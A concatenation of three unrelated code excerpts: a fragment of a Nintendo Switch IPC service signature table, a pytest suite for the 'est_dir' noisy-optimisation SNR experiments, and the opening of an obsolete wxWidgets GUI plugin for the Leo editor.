('nn::friends::detail::ipc::IFriendService', 30210, '0x10 bytes in - 0x40 bytes out - OutRaw<0x40,1,0>, InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 30211, '0x78 bytes in - 0 bytes out - InRaw<0x10,8,0x68>, InRaw<0x40,1,0>, InRaw<0x21,1,0x40>, Buffer<0,5,0>'),
('nn::friends::detail::ipc::IFriendService', 30212, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30213, '0x18 bytes in - 4 bytes out - OutRaw<4,4,0>, InRaw<0x10,8,0>, InRaw<8,8,0x10>, Buffer<0,6,0>'),
('nn::friends::detail::ipc::IFriendService', 30214, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,9,0>, Buffer<1,6,0>'),
('nn::friends::detail::ipc::IFriendService', 30215, '0x30 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<8,8,0x18>, InRaw<4,4,0>, InRaw<0x10,8,0x20>, Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>'),
('nn::friends::detail::ipc::IFriendService', 30216, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30217, '0x80 bytes in - 0 bytes out - InRaw<0x10,8,0x68>, InRaw<8,8,0x78>, InRaw<4,4,0x60>, InRaw<0x20,1,0>, InRaw<0x10,1,0x20>, InRaw<0x20,1,0x30>, InRaw<0x10,1,0x50>'),
('nn::friends::detail::ipc::IFriendService', 30400, '0x20 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<8,8,0x18>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 30401, '0x30 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<8,8,0x18>, InRaw<4,4,0>, InRaw<0x10,8,0x20>, Buffer<0,0x19,0x48>'),
('nn::friends::detail::ipc::IFriendService', 30402, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30500, '0x30 bytes in - 0 bytes out - Buffer<0,0x1A,0x400>, InRaw<0x10,8,0x20>, InRaw<0x20,1,0>'),
('nn::friends::detail::ipc::IFriendService', 30700, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 30810, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 30811, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<1,1,0>'),
('nn::friends::detail::ipc::IFriendService', 30812, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 30820, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 30830, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 49900, '0x10 bytes in - 0 bytes out - | |
<gh_stars>0
import numpy as np
import pytest
import est_dir
def test_1():
    """
    Test for num_exp_SNR_LS().

    Runs est_dir.num_exp_SNR_LS() once, sanity-checks the returned arrays,
    and then replays the experiment loop by hand with the same random seeds
    to verify that every output array is reproduced exactly.
    """
    f = est_dir.quad_f_noise
    f_no_noise = est_dir.quad_f
    function_type = 'quad'
    m = 100
    lambda_max = 1
    noise_list = np.array([1, 2])
    region = 0.1
    num_funcs = 5
    cov = np.identity(m)
    (sp_norms, sp_func_vals,
     fp_norms, fp_func_vals,
     sp_func_vals_noise,
     fp_func_vals_noise,
     time_taken, func_evals_step,
     func_evals_dir, no_its,
     good_dir_no_its_prop,
     good_dir_norm,
     good_dir_func) = est_dir.num_exp_SNR_LS(f, f_no_noise, m, num_funcs,
                                             lambda_max, cov, noise_list,
                                             region, function_type)
    # Basic sanity checks: norms, function values, evaluation counts,
    # timings and iteration counts must all be positive (step evals may be 0).
    assert(np.all(sp_norms > 0))
    assert(np.all(sp_func_vals > 0))
    assert(np.all(fp_norms > 0))
    assert(np.all(fp_func_vals > 0))
    assert(np.all(func_evals_step >= 0))
    assert(np.all(func_evals_dir > 0))
    assert(np.all(time_taken > 0))
    assert(np.all(no_its > 0))
    # Results for the two noise levels should not be identical across
    # all num_funcs runs (the noise level must actually matter) ...
    assert(np.where(fp_norms[0] == fp_norms[1])[0].shape[0] != num_funcs)
    assert(np.where(fp_func_vals[0] == fp_func_vals[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(func_evals_step[0] == func_evals_step[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(func_evals_dir[0] == func_evals_dir[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(good_dir_norm[0] == good_dir_norm[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(good_dir_func[0] == good_dir_func[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(time_taken[0] == time_taken[1])[0].shape[0] !=
           num_funcs)
    # ... but the starting points (generated before noise enters) must agree.
    assert(np.all(sp_norms[0] == sp_norms[1]))
    assert(np.all(sp_func_vals[0] == sp_func_vals[1]))
    # Replay the whole experiment manually with the same per-run seeds.
    test_sp_norms = np.zeros((noise_list.shape[0], num_funcs))
    test_fp_norms = np.zeros((noise_list.shape[0], num_funcs))
    test_sp_func_vals_noise = np.zeros((noise_list.shape[0], num_funcs))
    test_fp_func_vals_noise = np.zeros((noise_list.shape[0], num_funcs))
    test_sp_func_vals = np.zeros((noise_list.shape[0], num_funcs))
    test_fp_func_vals = np.zeros((noise_list.shape[0], num_funcs))
    test_time_taken = np.zeros((noise_list.shape[0], num_funcs))
    test_func_evals_step = np.zeros((noise_list.shape[0], num_funcs))
    test_func_evals_dir = np.zeros((noise_list.shape[0], num_funcs))
    test_no_its = np.zeros((noise_list.shape[0], num_funcs))
    test_good_dir_no_its_prop = np.zeros((noise_list.shape[0], num_funcs))
    test_good_dir_norm = np.zeros((noise_list.shape[0], num_funcs))
    test_good_dir_func = np.zeros((noise_list.shape[0], num_funcs))
    for index_noise in range(noise_list.shape[0]):
        for j in range(num_funcs):
            noise_sd = noise_list[index_noise]
            # Seeds must match those used inside num_exp_SNR_LS exactly,
            # otherwise the replication below cannot agree bit-for-bit.
            seed = j * 50
            np.random.seed(seed)
            centre_point = np.random.multivariate_normal(np.zeros((m)), cov)
            minimizer = np.zeros((m, ))
            matrix = est_dir.quad_func_params(1, lambda_max, m)
            test_sp_norms[index_noise, j] = np.linalg.norm(minimizer -
                                                           centre_point)
            test_sp_func_vals[index_noise, j] = est_dir.quad_f(centre_point,
                                                               minimizer,
                                                               matrix)
            func_args = (minimizer, matrix, 0, noise_sd)
            func_args_no_noise = (minimizer, matrix)
            np.random.seed(seed + 1)
            (upd_point_LS,
             test_sp_func_vals_noise[index_noise, j],
             test_fp_func_vals_noise[index_noise, j],
             test_time_taken[index_noise, j],
             test_func_evals_step[index_noise, j],
             test_func_evals_dir[index_noise, j],
             test_no_its[index_noise, j],
             store_good_dir,
             store_good_dir_norm,
             store_good_dir_func) = (est_dir.calc_its_until_sc_LS(
                                     centre_point, f, func_args, m,
                                     f_no_noise, func_args_no_noise,
                                     region))
            test_fp_norms[index_noise, j] = np.linalg.norm(minimizer -
                                                           upd_point_LS)
            test_fp_func_vals[index_noise, j] = est_dir.quad_f(upd_point_LS,
                                                               minimizer,
                                                               matrix)
            test_good_dir_no_its_prop[index_noise, j] = store_good_dir
            if len(store_good_dir_norm) > 0:
                test_good_dir_norm[index_noise,
                                   j] = np.mean(store_good_dir_norm)
                test_good_dir_func[index_noise,
                                   j] = np.mean(store_good_dir_func)
    # The manual replication must match num_exp_SNR_LS's outputs exactly
    # (time_taken is excluded: wall-clock times cannot be reproduced).
    assert(np.all(test_sp_norms == sp_norms))
    assert(np.all(test_sp_func_vals == sp_func_vals))
    assert(np.all(test_sp_func_vals_noise == sp_func_vals_noise))
    assert(np.all(test_fp_func_vals_noise == fp_func_vals_noise))
    assert(np.all(test_func_evals_step == func_evals_step))
    assert(np.all(test_func_evals_dir == func_evals_dir))
    assert(np.all(test_fp_norms == fp_norms))
    assert(np.all(test_fp_func_vals == fp_func_vals))
    assert(np.all(test_good_dir_no_its_prop == good_dir_no_its_prop))
    assert(np.all(test_good_dir_norm == good_dir_norm))
    assert(np.all(test_good_dir_func == good_dir_func))
def test_2():
    """
    Test for num_exp_SNR_XY().

    Same structure as test_1, but for the XY direction-estimation variant,
    which additionally takes n, no_vars and a per-noise-level budget of
    function evaluations (max_func_evals_list).
    """
    f = est_dir.quad_f_noise
    f_no_noise = est_dir.quad_f
    function_type = 'quad'
    m = 100
    n = 16
    lambda_max = 1
    noise_list = np.array([1, 2])
    max_func_evals_list = np.array([2000, 2000])
    no_vars = m
    region = 0.1
    num_funcs = 5
    store_max_func_evals = max_func_evals_list[0]
    cov = np.identity(m)
    (sp_norms, sp_func_vals,
     fp_norms, fp_func_vals,
     sp_func_vals_noise,
     fp_func_vals_noise,
     time_taken, func_evals_step,
     func_evals_dir, no_its,
     good_dir_no_its_prop,
     good_dir_norm,
     good_dir_func) = est_dir.num_exp_SNR_XY(f, f_no_noise, n, m, num_funcs,
                                             lambda_max, cov, noise_list,
                                             no_vars, region,
                                             max_func_evals_list,
                                             function_type,
                                             store_max_func_evals)
    # Basic sanity checks on the returned arrays.
    assert(np.all(sp_norms > 0))
    assert(np.all(sp_func_vals > 0))
    assert(np.all(fp_norms > 0))
    assert(np.all(fp_func_vals > 0))
    assert(np.all(func_evals_step > 0))
    assert(np.all(func_evals_dir > 0))
    assert(np.all(time_taken > 0))
    assert(np.all(no_its > 0))
    # Outputs must differ between the two noise levels ...
    assert(np.where(fp_norms[0] == fp_norms[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(fp_func_vals[0] == fp_func_vals[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(func_evals_step[0] == func_evals_step[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(func_evals_dir[0] == func_evals_dir[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(good_dir_norm[0] == good_dir_norm[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(good_dir_func[0] == good_dir_func[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(time_taken[0] == time_taken[1])[0].shape[0] !=
           num_funcs)
    # ... while the noise-independent starting points must agree.
    assert(np.all(sp_norms[0] == sp_norms[1]))
    assert(np.all(sp_func_vals[0] == sp_func_vals[1]))
    f = est_dir.quad_f_noise
    f_no_noise = est_dir.quad_f
    # Replay the whole experiment manually with the same per-run seeds.
    test_sp_norms = np.zeros((noise_list.shape[0], num_funcs))
    test_fp_norms = np.zeros((noise_list.shape[0], num_funcs))
    test_sp_func_vals_noise = np.zeros((noise_list.shape[0], num_funcs))
    test_fp_func_vals_noise = np.zeros((noise_list.shape[0], num_funcs))
    test_sp_func_vals = np.zeros((noise_list.shape[0], num_funcs))
    test_fp_func_vals = np.zeros((noise_list.shape[0], num_funcs))
    test_time_taken = np.zeros((noise_list.shape[0], num_funcs))
    test_func_evals_step = np.zeros((noise_list.shape[0], num_funcs))
    test_func_evals_dir = np.zeros((noise_list.shape[0], num_funcs))
    test_no_its = np.zeros((noise_list.shape[0], num_funcs))
    test_good_dir_no_its_prop = np.zeros((noise_list.shape[0], num_funcs))
    test_good_dir_norm = np.zeros((noise_list.shape[0], num_funcs))
    test_good_dir_func = np.zeros((noise_list.shape[0], num_funcs))
    for index_noise in range(noise_list.shape[0]):
        max_func_evals = max_func_evals_list[index_noise]
        for j in range(num_funcs):
            noise_sd = noise_list[index_noise]
            # Seeds must match those used inside num_exp_SNR_XY exactly.
            seed = j * 50
            np.random.seed(seed)
            centre_point = np.random.multivariate_normal(np.zeros((m)), cov)
            minimizer = np.zeros((m, ))
            matrix = est_dir.quad_func_params(1, lambda_max, m)
            test_sp_norms[index_noise, j] = np.linalg.norm(minimizer -
                                                           centre_point)
            test_sp_func_vals[index_noise, j] = est_dir.quad_f(centre_point,
                                                               minimizer,
                                                               matrix)
            func_args = (minimizer, matrix, 0, noise_sd)
            func_args_no_noise = (minimizer, matrix)
            np.random.seed(seed + 1)
            (upd_point_XY,
             test_sp_func_vals_noise[index_noise, j],
             test_fp_func_vals_noise[index_noise, j],
             test_time_taken[index_noise, j],
             test_func_evals_step[index_noise, j],
             test_func_evals_dir[index_noise, j],
             test_no_its[index_noise, j],
             store_good_dir,
             store_good_dir_norm,
             store_good_dir_func) = (est_dir.calc_its_until_sc_XY(
                                     centre_point, f, func_args, n, m,
                                     f_no_noise, func_args_no_noise,
                                     no_vars, region, max_func_evals))
            test_fp_norms[index_noise, j] = np.linalg.norm(minimizer -
                                                           upd_point_XY)
            test_fp_func_vals[index_noise, j] = est_dir.quad_f(upd_point_XY,
                                                               minimizer,
                                                               matrix)
            test_good_dir_no_its_prop[index_noise, j] = store_good_dir
            if len(store_good_dir_norm) > 0:
                test_good_dir_norm[index_noise,
                                   j] = np.mean(store_good_dir_norm)
                test_good_dir_func[index_noise,
                                   j] = np.mean(store_good_dir_func)
    # The manual replication must match num_exp_SNR_XY's outputs exactly
    # (time_taken is excluded: wall-clock times cannot be reproduced).
    assert(np.all(test_sp_norms == sp_norms))
    assert(np.all(test_sp_func_vals == sp_func_vals))
    assert(np.all(test_sp_func_vals_noise == sp_func_vals_noise))
    assert(np.all(test_fp_func_vals_noise == fp_func_vals_noise))
    assert(np.all(test_func_evals_step == func_evals_step))
    assert(np.all(test_func_evals_dir == func_evals_dir))
    assert(np.all(test_fp_norms == fp_norms))
    assert(np.all(test_fp_func_vals == fp_func_vals))
    assert(np.all(test_good_dir_no_its_prop == good_dir_no_its_prop))
    assert(np.all(test_good_dir_norm == good_dir_norm))
    assert(np.all(test_good_dir_func == good_dir_func))
def test_3():
    """
    Test for num_exp_SNR_MP().

    Same structure as test_2, but for the MP direction-estimation variant
    (calc_its_until_sc_MP).
    """
    f = est_dir.quad_f_noise
    f_no_noise = est_dir.quad_f
    function_type = 'quad'
    m = 100
    n = 16
    lambda_max = 1
    noise_list = np.array([1, 2])
    max_func_evals_list = np.array([2000, 2000])
    store_max_func_evals = max_func_evals_list[0]
    no_vars = m
    region = 0.1
    num_funcs = 5
    cov = np.identity(m)
    (sp_norms, sp_func_vals,
     fp_norms, fp_func_vals,
     sp_func_vals_noise,
     fp_func_vals_noise,
     time_taken, func_evals_step,
     func_evals_dir, no_its,
     good_dir_no_its_prop,
     good_dir_norm,
     good_dir_func) = est_dir.num_exp_SNR_MP(f, f_no_noise, n, m, num_funcs,
                                             lambda_max, cov, noise_list,
                                             no_vars, region,
                                             max_func_evals_list,
                                             function_type,
                                             store_max_func_evals)
    # Basic sanity checks on the returned arrays.
    assert(np.all(sp_norms > 0))
    assert(np.all(sp_func_vals > 0))
    assert(np.all(fp_norms > 0))
    assert(np.all(fp_func_vals > 0))
    assert(np.all(func_evals_step > 0))
    assert(np.all(func_evals_dir > 0))
    assert(np.all(time_taken > 0))
    assert(np.all(no_its > 0))
    # Outputs must differ between the two noise levels ...
    assert(np.where(fp_norms[0] == fp_norms[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(fp_func_vals[0] == fp_func_vals[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(func_evals_step[0] == func_evals_step[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(func_evals_dir[0] == func_evals_dir[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(good_dir_norm[0] == good_dir_norm[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(good_dir_func[0] == good_dir_func[1])[0].shape[0] !=
           num_funcs)
    assert(np.where(time_taken[0] == time_taken[1])[0].shape[0] !=
           num_funcs)
    # ... while the noise-independent starting points must agree.
    assert(np.all(sp_norms[0] == sp_norms[1]))
    assert(np.all(sp_func_vals[0] == sp_func_vals[1]))
    f = est_dir.quad_f_noise
    f_no_noise = est_dir.quad_f
    # Replay the whole experiment manually with the same per-run seeds.
    test_sp_norms = np.zeros((noise_list.shape[0], num_funcs))
    test_fp_norms = np.zeros((noise_list.shape[0], num_funcs))
    test_sp_func_vals_noise = np.zeros((noise_list.shape[0], num_funcs))
    test_fp_func_vals_noise = np.zeros((noise_list.shape[0], num_funcs))
    test_sp_func_vals = np.zeros((noise_list.shape[0], num_funcs))
    test_fp_func_vals = np.zeros((noise_list.shape[0], num_funcs))
    test_time_taken = np.zeros((noise_list.shape[0], num_funcs))
    test_func_evals_step = np.zeros((noise_list.shape[0], num_funcs))
    test_func_evals_dir = np.zeros((noise_list.shape[0], num_funcs))
    test_no_its = np.zeros((noise_list.shape[0], num_funcs))
    test_good_dir_no_its_prop = np.zeros((noise_list.shape[0], num_funcs))
    test_good_dir_norm = np.zeros((noise_list.shape[0], num_funcs))
    test_good_dir_func = np.zeros((noise_list.shape[0], num_funcs))
    for index_noise in range(noise_list.shape[0]):
        max_func_evals = max_func_evals_list[index_noise]
        for j in range(num_funcs):
            noise_sd = noise_list[index_noise]
            # Seeds must match those used inside num_exp_SNR_MP exactly.
            seed = j * 50
            np.random.seed(seed)
            centre_point = np.random.multivariate_normal(np.zeros((m)), cov)
            minimizer = np.zeros((m, ))
            matrix = est_dir.quad_func_params(1, lambda_max, m)
            test_sp_norms[index_noise, j] = np.linalg.norm(minimizer -
                                                           centre_point)
            test_sp_func_vals[index_noise, j] = est_dir.quad_f(centre_point,
                                                               minimizer,
                                                               matrix)
            func_args = (minimizer, matrix, 0, noise_sd)
            func_args_no_noise = (minimizer, matrix)
            np.random.seed(seed + 1)
            (upd_point_MP,
             test_sp_func_vals_noise[index_noise, j],
             test_fp_func_vals_noise[index_noise, j],
             test_time_taken[index_noise, j],
             test_func_evals_step[index_noise, j],
             test_func_evals_dir[index_noise, j],
             test_no_its[index_noise, j],
             store_good_dir,
             store_good_dir_norm,
             store_good_dir_func) = (est_dir.calc_its_until_sc_MP(
                                     centre_point, f, func_args, n, m,
                                     f_no_noise, func_args_no_noise,
                                     no_vars, region, max_func_evals))
            test_fp_norms[index_noise, j] = np.linalg.norm(minimizer -
                                                           upd_point_MP)
            test_fp_func_vals[index_noise, j] = est_dir.quad_f(upd_point_MP,
                                                               minimizer,
                                                               matrix)
            test_good_dir_no_its_prop[index_noise, j] = store_good_dir
            if len(store_good_dir_norm) > 0:
                test_good_dir_norm[index_noise,
                                   j] = np.mean(store_good_dir_norm)
                test_good_dir_func[index_noise,
                                   j] = np.mean(store_good_dir_func)
    # The manual replication must match num_exp_SNR_MP's outputs exactly
    # (time_taken is excluded: wall-clock times cannot be reproduced).
    assert(np.all(test_sp_norms == sp_norms))
    assert(np.all(test_sp_func_vals == sp_func_vals))
    assert(np.all(test_sp_func_vals_noise == sp_func_vals_noise))
    assert(np.all(test_fp_func_vals_noise == fp_func_vals_noise))
    assert(np.all(test_func_evals_step == func_evals_step))
    assert(np.all(test_func_evals_dir == func_evals_dir))
    assert(np.all(test_fp_norms == fp_norms))
    assert(np.all(test_fp_func_vals == fp_func_vals))
    assert(np.all(test_good_dir_no_its_prop == good_dir_no_its_prop))
    assert(np.all(test_good_dir_norm == good_dir_norm))
    assert(np.all(test_good_dir_func == good_dir_func))
def test_4():
    """
    Test for calc_initial_func_values() and compute_var_quad_form()
    with region = 1.

    Checks that the starting function values are positive and that the
    noise standard deviations returned by compute_var_quad_form() achieve
    the requested signal-to-noise ratios (to 6 decimal places).
    """
    quad_no_noise = est_dir.quad_f
    m = 100
    num_funcs = 100
    lambda_max = 1
    snr_list = [0.5, 0.75, 1, 2]
    region = 1
    identity_cov = np.identity(m)
    sp_func_vals = est_dir.calc_initial_func_values(
        m, num_funcs, lambda_max, identity_cov, quad_no_noise)
    assert sp_func_vals.shape == (num_funcs, )
    assert np.all(sp_func_vals > 0)
    noise_list = est_dir.compute_var_quad_form(
        snr_list, sp_func_vals, region)
    # Achieved SNR = var(region-scaled values) / noise variance.
    achieved_snr = np.round(np.var(sp_func_vals * region) /
                            (noise_list**2), 6)
    for k in range(noise_list.shape[0]):
        assert np.all(achieved_snr[k] == np.round(snr_list[k], 6))
def test_5():
    """
    Test for calc_initial_func_values() and compute_var_quad_form()
    with region = 0.1.

    Same check as test_4 but with a smaller region, confirming that the
    computed noise levels still achieve the requested SNRs.
    """
    quad_no_noise = est_dir.quad_f
    m = 100
    num_funcs = 100
    lambda_max = 1
    snr_list = [0.5, 0.75, 1, 2]
    region = 0.1
    identity_cov = np.identity(m)
    sp_func_vals = est_dir.calc_initial_func_values(
        m, num_funcs, lambda_max, identity_cov, quad_no_noise)
    assert sp_func_vals.shape == (num_funcs, )
    assert np.all(sp_func_vals > 0)
    noise_list = est_dir.compute_var_quad_form(
        snr_list, sp_func_vals, region)
    # Achieved SNR = var(region-scaled values) / noise variance.
    achieved_snr = np.round(np.var(sp_func_vals * region) /
                            (noise_list**2), 6)
    for k in range(noise_list.shape[0]):
        assert np.all(achieved_snr[k] == np.round(snr_list[k], 6))
def test_6():
    """
    Test for quad_LS_XY_MP() with store_max_func_evals set to None
    (no fixed evaluation budget supplied): a smoke test that the full
    pipeline runs without raising.
    """
    noisy_quad = est_dir.quad_f_noise
    quad_no_noise = est_dir.quad_f
    function_type = 'quad'
    m = 100
    n = 16
    lambda_max = 1
    num_funcs = 5
    no_vars = m
    snr_list = [0.5, 0.75, 1, 2]
    region = 0.1
    store_max_func_evals = None
    identity_cov = np.identity(m)
    sp_func_vals = est_dir.calc_initial_func_values(
        m, num_funcs, lambda_max, identity_cov, quad_no_noise)
    noise_list = est_dir.compute_var_quad_form(
        snr_list, sp_func_vals, region)
    est_dir.quad_LS_XY_MP(noisy_quad, quad_no_noise, n, m, num_funcs,
                          lambda_max, identity_cov, noise_list, no_vars,
                          region, function_type, store_max_func_evals)
def test_7():
"""
Test for quad_LS_XY_MP() with
store_max_func_evals = [1000, 1000, 2000, 2000].
"""
f = est_dir.quad_f_noise
f_no_noise = est_dir.quad_f
function_type = 'quad'
m = 100
n = 16
lambda_max = 1
num_funcs = 5
cov = np.identity(m)
no_vars = m
snr_list = [0.5, 0.75, 1, 2]
region = 0.1
store_max_func_evals = [1000, 1000, 2000, 2000]
sp_func_vals = (est_dir.calc_initial_func_values(
m, num_funcs, lambda_max, | |
<gh_stars>1000+
# -*- coding: utf-8 -*-
#@+leo-ver=5-thin
#@+node:ekr.20090126093408.1: * @file ./obsolete/wxGui.py
#@@first
'''A plugin to use wxWidgets as Leo's gui.
**Important**: this plugin is largely unfinished.
Do not use this plugin for production work!
See the "bug list & to-do" section for more details.
'''
__version__ = '0.1'
#@+<< version history >>
#@+node:ekr.20090126093408.2: ** << version history >>
#@@nocolor
#@+at
#
# 0.1 EKR: Based on version 0.7.2 of __wx_gui.py.
#@-<< version history >>
#@+<< bug list & to-do >>
#@+node:ekr.20090126093408.3: ** << bug list & to-do >>
#@@nocolor
#@+at
#
# First:
# * Arrow keys do not work
# - Add dummy transaction so ctrl-v works initially.
# - Don't redraw the entire screen to add/remove text box in the icon.
# - Add color to Log pane text.
# - Get aspell working: use g.pdb to trace aspell startup logic.
#
# Bug list: (All unit tests pass on XP, 4 failures & 2 errors on Linux).
#
# * Autocompletion does not work.
# * Multiple body editors do not work, and crash unit tests in Linux.
# - Completion tab is too small (XP only).
# - The Spell tab functionality is empty, and aspell is not imported properly.
#
# Later:
# - Change background of the tree pane when it has focus.
# - Convert Tk color names to rgb values.
# - Convert Tk font names to wx font names?
# - Support user-colorizer in the stc.
#@-<< bug list & to-do >>
#@+<< imports >>
#@+node:ekr.20090126093408.4: ** << imports >>
import leo.core.leoGlobals as g
import leo.core.leoPlugins as leoPlugins
import leo.core.leoColor as leoColor
import leo.core.leoCommands as leoCommands
import leo.core.leoFind as leoFind
import leo.core.leoFrame as leoFrame
import leo.core.leoGui as leoGui
import leo.core.leoKeys as leoKeys
import leo.core.leoMenu as leoMenu
import leo.core.leoNodes as leoNodes
import leo.core.leoUndo as leoUndo
import leo.plugins.baseNativeTree as baseNativeTree
import os
import string
import sys
import traceback
try:
import wx
import wx.lib
import wx.lib.colourdb
except ImportError:
wx = None
g.es_print('wx_gui plugin: can not import wxWidgets')
try:
import wx.richtext as richtext
except ImportError:
richtext = None
try:
import wx.stc as stc
except ImportError:
stc = None
#@-<< imports >>
#@+others
#@+node:ekr.20090126093408.5: ** Module level
#@+others
#@+node:ekr.20090126093408.6: *3* init
def init ():
    """Install the wxWidgets gui as Leo's gui.

    Returns True on success.  Requires wxPython 2.8 or later, no
    previously-installed gui, and not running under unit tests.
    """
    if not wx: return False
    version_parts = wx.version().split('.')
    major, minor = version_parts[0], version_parts[1]
    if not g.CheckVersion ('%s.%s' % (major,minor),'2.8'):
        g.es_print('wx_gui plugin requires wxPython 2.8 or later')
        return False
    # Installing a gui is not Ok while unit testing.
    ok = wx and not g.app.gui and not g.app.unitTesting
    if ok:
        # Create and finish the gui, then sign on.
        g.app.gui = wxGui()
        g.app.root = g.app.gui.createRootWindow()
        g.app.gui.finishCreate()
        g.plugin_signon(__name__)
    elif g.app.gui and not g.app.unitTesting:
        s = "Can't install wxPython gui: previous gui installed"
        g.es_print(s,color="red")
    return ok
#@+node:ekr.20090126093408.7: *3* name2color
def name2color (name,default='white'):
# A hack: these names are *not* part of the color list!
if name in wx.GetApp().leo_colors:
return name
for z in (name,name.upper()):
for name2,r2,g2,b2 in wx.lib.colourdb.getColourInfoList():
if z == name2:
return wx.Colour(r2,g2,b2)
g.trace('color name not found',name)
return default
#@-others
#@+node:ekr.20090126093408.858: ** Frame and component classes
#@+node:ekr.20090126093408.8: *3* Find/Spell classes
#@+node:ekr.20090126093408.9: *4* wxSearchWidget
class wxSearchWidget:
    """A dummy widget class to pass to Leo's core find code.

    Mimics just enough text-widget state (insert point, selection, text)
    for the find logic to drive it; the instance doubles as its own
    body and bodyCtrl.
    """
    #@+others
    #@+node:ekr.20090126093408.10: *5* wxSearchWidget.__init__
    def __init__ (self):
        # Placeholder state for the find machinery.
        self.insertPoint = 0
        self.selection = (0, 0)
        self.bodyCtrl = self
        self.body = self
        self.text = None
    #@-others
#@+node:ekr.20090126093408.13: *4* wxFindFrame class
class wxFindFrame (wx.Frame,leoFind.leoFind):
    """A top-level Find/Change dialog wrapping Leo's core find code.

    NOTE(review): this is presently a single global window, not one per
    commander; see the comment in __init__.
    """
    #@+others
    #@+node:ekr.20090126093408.14: *5* FindFrame.__init__
    def __init__ (self,c):
        """Create the frame, its find panel, and all wx event bindings."""
        # Init the base classes
        wx.Frame.__init__(self,None,-1,"Leo Find/Change",
            wx.Point(50,50), wx.DefaultSize,
            wx.MINIMIZE_BOX | wx.THICK_FRAME | wx.SYSTEM_MENU | wx.CAPTION)
        # At present this is a global window, so the c param doesn't make sense.
        # This must be changed to match how Leo presently works.
        leoFind.leoFind.__init__(self,c)
        self.dict = {} # For communication between panel and frame.
        self.findPanel = wxFindPanel(self)
        self.s_text = wxSearchWidget() # Working text widget.
        #@+<< resize the frame to fit the panel >>
        #@+node:ekr.20090126093408.15: *6* << resize the frame to fit the panel >>
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(self.findPanel)
        self.SetAutoLayout(True)# tell dialog to use sizer
        self.SetSizer(sizer) # actually set the sizer
        sizer.Fit(self)# set size to minimum size as calculated by the sizer
        sizer.SetSizeHints(self)# set size hints to honour minimum size
        #@-<< resize the frame to fit the panel >>
        # Set the window icon.
        if wx.Platform == '__WXMSW__':
            pass ## self.SetIcon(wx.Icon("LeoIcon"))
        # Set the focus.
        self.findPanel.findText.SetFocus()
        #@+<< define event handlers >>
        #@+node:ekr.20090126093408.16: *6* << define event handlers >>
        wx.EVT_CLOSE(self,self.onCloseFindFrame)
        #@+<< create event handlers for buttons >>
        #@+node:ekr.20090126093408.17: *7* << create event handlers for buttons >>
        for name,command in (
            ("changeButton",self.changeButton),
            ("changeAllButton",self.changeAllButton),
            ("changeThenFindButton",self.changeThenFindButton),
            ("findButton",self.findButton),
            ("findAllButton",self.findAllButton)):
            # command=command binds each button's command at definition time,
            # avoiding the late-binding-closure pitfall.
            def eventHandler(event,command=command):
                # g.trace(command)
                command()
            # NOTE(review): const_dict is not defined in this part of the file;
            # presumably a module-level map of widget names to wx ids -- confirm.
            id = const_dict.get(name)
            assert(id)
            wx.EVT_BUTTON(self,id,eventHandler)
        #@-<< create event handlers for buttons >>
        #@+<< create event handlers for check boxes and text >>
        #@+node:ekr.20090126093408.18: *7* << create event handlers for check boxes and text >>
        textKeys = ["find_text","change_text"]
        keys = textKeys[:]
        for item in self.intKeys:
            keys.append(item)
        for name in keys:
            if name not in textKeys:
                name += "_flag"
            # self=self and name=name bind the loop variables at definition time.
            def eventHandler(event,self=self,name=name):
                box = event.GetEventObject()
                val = box.GetValue()
                # g.trace(name,val)
                setattr(self.c,name,val)
            id = const_dict.get(name)
            if id:
                if name in textKeys:
                    wx.EVT_TEXT(self,id,eventHandler)
                else:
                    wx.EVT_CHECKBOX(self,id,eventHandler)
        #@-<< create event handlers for check boxes and text >>
        #@-<< define event handlers >>
    #@+node:ekr.20090126093408.19: *5* bringToFront
    def bringToFront (self):
        """Raise the window, re-init the panel from c, and select the find text."""
        g.app.gui.bringToFront(self)
        self.init(self.c)
        self.findPanel.findText.SetFocus()
        self.findPanel.findText.SetSelection(-1,-1)
    #@+node:ekr.20090126093408.20: *5* destroySelf
    def destroySelf (self):
        """Destroy the wx.Frame and all its children."""
        self.Destroy()
    #@+node:ekr.20090126093408.21: *5* onCloseFindFrame
    def onCloseFindFrame (self,event):
        """Hide the dialog instead of destroying it whenever the close can be vetoed."""
        if event.CanVeto():
            event.Veto()
            self.Hide()
